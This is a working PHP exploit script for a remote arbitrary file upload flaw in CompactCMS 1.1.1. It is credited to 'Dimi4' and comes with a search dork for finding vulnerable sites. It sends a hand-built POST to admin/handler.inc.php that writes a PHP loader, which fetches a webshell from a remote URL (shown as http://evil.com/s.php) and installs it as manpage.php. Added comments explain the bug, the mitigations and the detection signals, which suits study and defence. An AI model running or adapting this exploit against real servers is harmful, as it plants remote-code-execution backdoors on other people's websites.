CompactCMS v 1.1.1 Remote Arbitrary File Upload Exploit PHP:
<?php
/**
 * @Product: MMIX - CompactCMS
 * @Version: 1.1.1
 * @Site: CompactCMS.nl
 * @Dork: "© 2009 CompactCMS"
 * @Found by: Dimi4
 * @Date: 8.04.2009
 * @Greetz: antichat, UASC[http://uasc.org.ua]
 * @Bug Function [admin\handler.inc.php] [50-62 lines] :
 *
 */
/////////////////////////////////////////////////////////////////////
## $name = htmlentities($_GET['file']);                              #
## $content = $_POST['content'];                                     #
## $filename = "../content/".htmlentities($_GET['file']).".php";     #
##                                                                   #
## if (is_writable($filename)) {                                     #
##   if (!$handle = fopen($filename, 'w')) {                         #
##     echo "[ERR105] ".$sw_err02." (".$filename.").";               #
##     exit;                                                         #
##   }                                                               #
##   if (fwrite($handle, $content) === FALSE) {                      #
##     echo "[ERR106] ".$sw_err03." (".$filename.").";               #
##     exit;                                                         #
##   }                                                               #
////////////////////////////////////////////////////////////////////
//
// Review note (defender view of the handler excerpt above): the only
// processing applied to $_GET['file'] is htmlentities(), which encodes HTML
// metacharacters but is not a path or file-name check, and the result is
// written under ../content/ with a fixed ".php" suffix. $_POST['content'] is
// passed to fwrite() unchanged, so the caller picks both the file name and
// the PHP source stored in it; the only gate visible in the excerpt is
// is_writable(). Nothing in these lines ties the write to an authenticated
// session (lines before 50 are not shown, so an earlier check may exist).
// Mitigation on the application side: require an authenticated,
// CSRF-protected request before the write, restrict the name to a strict
// allowlist (basename() plus an alphanumeric pattern, no user-chosen
// extension), never store user-supplied content where the web server will
// execute it, and deny PHP execution under content/ at the server level.

// Warnings are silenced and the CLI run is not time-limited. Note that the
// suppression also hides the uninitialised-variable notices for $response
// and $payload further down.
error_reporting(0);
set_time_limit(0);

/**
 * Minimal raw-HTTP client: opens a plain TCP socket to $host on port 80,
 * writes $packet byte-for-byte and accumulates the reply until
 * socket_read() returns an empty/false chunk, then closes the socket.
 * No TLS, no timeout and no status-line parsing; a socket_create() or
 * socket_connect() failure terminates the process via die().
 * $response is appended to without being initialised (see the
 * error_reporting(0) note above).
 */
function http_send($host, $packet)
{
    if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) == false)
        die("\nsocket_create(): " . socket_strerror($s) . "\n");
    if (socket_connect($s, $host, 80) == false)
        die("\nsocket_connect(): " . socket_strerror(socket_last_error()) . "\n");
    socket_write($s, $packet, strlen($packet));
    // Read until the server closes the connection (HTTP/1.0, no keep-alive).
    while ($m = socket_read($s, 2048)) $response .= $m;
    socket_close($s);
    return $response;
}

// Prints command-line usage and exits; $argv is read through `global`.
function help()
{
    global $argv;
    echo "\n\n[?] Usage: ".$argv[0]." <host> <path> <shell>.\n\n";
    echo "[?][?] Ex: ".$argv[0]." www.host.com /ct/ http://evil.com/s.php\n\n";
    echo "[?] Usage: ".$argv[0]." <host> <path> <shell> <login> <pass>.\n\n";
    echo "[?][?] Ex (Basic AUTH): ".$argv[0]." www.host.com /ct/ http://evil.com/s.php admin 12345\n\n";
    die();
}

// Only the first argument is checked; missing $argv[2..5] silently become
// null because notices are suppressed.
if ($argv[1] == "") {
    help();
    die();
}

// Positional CLI arguments. $login/$pass are optional and are only used to
// build a Basic Authorization header below. Both file names are hard-coded
// constants, which makes the resulting files easy to search for on disk
// during incident response: content/1123.php and content/manpage.php.
$host = $argv[1];
$path = $argv[2];
$shell = $argv[3];
$login = $argv[4];
$pass = $argv[5];
$tmpshell = "1123";
$shellname = "manpage.php";

// Form body that the handler excerpt stores verbatim as content/1123.php:
// PHP that copy()s a remote URL to manpage.php, deletes 1123.php and
// redirects to the copy. Because copy() is given a URL, this step only
// works when allow_url_fopen is enabled on the target, and it shows up as
// an outbound HTTP request from the web server to a third-party host -- a
// useful egress-monitoring signal. ($payload is appended to before being
// initialised.)
$payload .= "action=Save changes&content=<?php copy('{$shell}', './{$shellname}'); unlink('{$tmpshell}.php'); header('Location:{$shellname}');?>\r\n\r\n";

echo(" ------------------------------------------------------------------ \tCompactCMS v 1.1.1 Remote Arbitrary File Upload Exploit ------------------------------------------------------------------\n\n");
echo("**\t Coded by Dimi4, greetz Antichat\n\n");
echo ("[+] Connecting to {$host}...\n");

// Hand-built HTTP/1.0 request with an absolute-URI request line. Detection
// artifacts visible in these bytes: a POST to admin/handler.inc.php with
// file= on the query string, a body beginning "action=Save changes&content=<?php",
// and the misspelled header name "prama: no-cache", which a normal browser
// never sends.
$packet = "POST http://{$host}/{$path}/admin/handler.inc.php?file={$tmpshell} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "prama: no-cache\r\n";
// Optional HTTP Basic credentials for installs that front the admin
// directory with server-level auth.
if(!empty($login) && !empty($pass)) {
    $packet .= "Authorization: Basic ".base64_encode($login.':'.$pass)."\r\n";
}
$packet .= "Accept: text/html\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\n\n";
$packet .= $payload;

$response = http_send($host, $packet);
//echo ($response);

// The only response check is for a WWW-Authenticate header; the script
// otherwise reports success whether or not the target wrote anything.
if (preg_match("/WWW-Authenticate/i", $response)) {
    die("[-] Authorization Required. Set Login And Password or CORRECT them please!\n");
} else {
    echo ("[+] Sending Payload...\n");
    echo ("[+] Downloading shell...\n");
    // This fetch runs on the local machine, not the target: the "Maybe"
    // prefix only says whether $shell was reachable from here.
    if(!file_get_contents($shell)) {
        echo ("\t[!] Warning! Can't Download shell!\n");
        $warning = "Maybe";
    }
    echo ("\t[+]$warning Successful! Check: http://{$host}{$path}content/$tmpshell.php\n");
    die();
}
?>